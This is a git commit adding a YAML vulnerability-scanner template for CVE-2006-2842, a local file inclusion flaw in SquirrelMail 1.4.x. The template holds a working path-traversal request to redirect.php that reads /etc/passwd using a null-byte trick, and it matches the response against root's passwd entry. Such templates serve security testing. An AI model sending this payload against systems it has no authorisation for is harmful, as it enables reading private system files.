Create CVE-2006-2842.yaml

patch-1
Dhiyaneshwaran 2021-11-15 23:40:49 +05:30 committed by GitHub
parent fcbbb3475c
commit fc2f0a0ea3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: CVE-2006-2842
info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail
requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200